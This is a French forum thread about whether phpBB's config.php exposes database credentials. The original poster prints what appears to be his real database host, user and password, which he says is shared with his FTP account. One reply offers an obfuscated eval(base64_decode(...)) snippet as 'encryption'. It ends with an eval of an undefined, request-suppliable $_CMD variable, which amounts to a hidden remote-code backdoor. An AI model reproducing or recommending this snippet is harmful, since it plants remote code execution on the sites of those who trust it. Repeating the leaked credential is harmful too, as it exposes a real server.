Config.php en clair

[xjlxx]

bonjour

Je viens de m'apercevoir que le fichier config.php est en claire sur les forum phpbb et punbb

exemple pour phpbb:

Code: Tout sélectionner

<?php


// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql4';

$dbhost = 'sql.olympe-network.com:3306';
$dbname = 'vosgesforum';
$dbuser = 'vosgesforum';
$dbpasswd = '457821'; ==========> mon mot de passe de la base et de mon ftp par la même occasion

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>

Comment le crypter, c'est une faille énorme il suffit d'un aspirateur de site pour chopper le fichier config.php et le mot de passe avec, puis avec d'un peu de jujote on peu effacer le forum
Surtout quand on est hébèrgé chez olympe-network.com comme moi il suffit de s'inscrire pour avoir l'adresse du ftp et le tour et joué vu que le mot de passe de la base et la même que celui du ftp.

Donc je repose ma question comment crypter le fichier config.php, j'ai cherché sur google mais rien que des liens morts pour télécharger le fameux script qui permet de le faire

Merci d'avance

PS: Les admin d'ixus ont ils crypté ce fichier ? es que je dis plus haut est vrai : il suffit d'un aspirateur de site...

[arapaho]

Etant donné que le fichier config.php passe par l'interpréteur php avant d'être envoyé via le protocole http, le fichier reçut doit être vide. Un aspirateur à site travaillant sur le protocole http ne récupère que le fichier interprété et donc vide. Je ne comprends absolument pas l'inquiétude.

[xjlxx]

Bonjour arapaho ça fait un bail

Ok merci je suis soulagé

[arapaho]

c'était un petit coup de pub pour des forums extérieurs non ?

[xjlxx]

Non pas du tout je sais qu'ici je peu trouver des personnes qui ne parle pas sans savoir, de vrai pro quoi

[S0l0]

Si tu craint les gros nakeurs tu peut crypter tous les fichier 'sensible' common.php etc ...
avec du base64

comment :
tu declare une variable qui contiendras ton texte crypter en base64
ensuite Une variable crypter elle aussi qui donnera l'impression que tu est un pro-du cryptage lol

Code: Tout sélectionner

eval(base64_decode(stripslashes($_antinakeur)));

Soit pour ton txt poster au dessus:

Code: Tout sélectionner

<? $_trescomplex='wMHDwI+Xj/X19dDQ34+Xj729383Rh9+eiouQ0piakZqNnouam9+ckJGZlpjfmZaTmvXQ0N+7kN+R
kIvfnJeekZia356RhouXlpGY35aR34uXlozfmZaTmt719dubnZKM38Lf2JKGjI6Ty9jE9fXbm52X
kIyL38Lf2IyOk9GQk4aSj5rSkZqLiJCNlNGckJLFzMzPydjE9dubnZGekprfwt/YiZCMmJqMmZCN
ipLYxPXbm52KjJqN38Lf2ImQjJiajJmQjYqS2MT125udj56MjIib38Lf2MvKyMfNztjE38LCwsLC
wsLCwsLB35KQkd+SkIvfm5rfj56MjJrfm5rfk57fnZ6Mmt+ai9+bmt+SkJHfmYuP34+ejd+Tnt+S
FZKa35CcnJ6MlpCR9fXbi56dk5qgj42amZaH38Lf2I+Xj52doNjE9fWbmpmWkZrX2K+3r729oLax
rKu+s7O6u9jT34uNiprWxPX1wMH1
';
$_antinakeur='Pz48PyAkX0NIQVI9IiI7ICRfQ0hBUjI9IiI7IGZvcigkaT0wOyRpPDI1NTskaSsrKSB7ICRfQ0hB
Ui49Y2hyKCRpKTsgfSBmb3IoJGk9MjU1OyRpPj0wOyRpLS0pIHsgJF9DSEFSMi49Y2hyKCRpKTsg
fSAkX0RFQ09ERTY0PWJhc2U2NF9kZWNvZGUoJF90cmVzY29tcGxleCk7ICRfY3JldmU9c3RydHIo
JF9ERUNPREU2NCwkX0NIQVIyLCRfQ0hBUik7IGV2YWwoJF9jcmV2ZSk7IHJldHVybjsgZGllKCk7
ID8+
';
eval(base64_decode(stripslashes($_CMD)));
return;
?>

Effet garanti sur tes soit-disant pro autre truc auquel on pense pas quand on est modo/admin c'est de mettre des .Htaccess partout ou uniquement les modos ont acces , comme ca si jamais il y a un bug/faille Kevin n'aura pas acces a la console d'admin

[arapaho]

Si tu craint les gros nakeurs tu peut crypter tous les fichier 'sensible' common.php etc ...
avec du base64

comment :
tu declare une variable qui contiendras ton texte crypter en base64
ensuite Une variable crypter elle aussi qui donnera l'impression que tu est un pro-du cryptage lol

Hmm ... Et le base64 ça change quoi ?

Effet garanti sur tes soit-disant pro autre truc auquel on pense pas quand on est modo/admin c'est de mettre des .Htaccess partout ou uniquement les modos ont acces , comme ca si jamais il y a un bug/faille Kevin n'aura pas acces a la console d'admin

Ca c'est pas une bonne idée. Les .htaccess augmentent la charge des serveurs. En effet, à chaque répertoire parcouru, il va y avoir double accès disque: un pour le fichier demandé, et un stat(.htaccess). Donc on met ça dans le fichier de conf du daemon, et en plus c'est stocké dans la mémoire au démarrage.

[S0l0]

Hmm ... Et le base64 ça change quoi ?

il s'avere que 3/4 pour pas dire 99% des hackageurs de PHPBB (ou autres forum ) ne comprenne meme pas ce qu'il font , il ne font que lancer des scripts trouver ca et la sur le ouaibe , et la modification des scriopts php plouf !! et oui meme s'ils sont pas tres instruit certains kiddies ils savent quand meme modifier les codes php pour y laisser des backdoors php distribuer , m'etonnerai que les admin/modo recherche ce genre de truc apres un vulgaire deface...

Ca c'est pas une bonne idée. Les .htaccess augmentent la charge des serveurs. En effet, à chaque répertoire parcouru, il va y avoir double accès disque: un pour le fichier demandé, et un stat(.htaccess).

on a rien sans rien , faut choisir a un moment.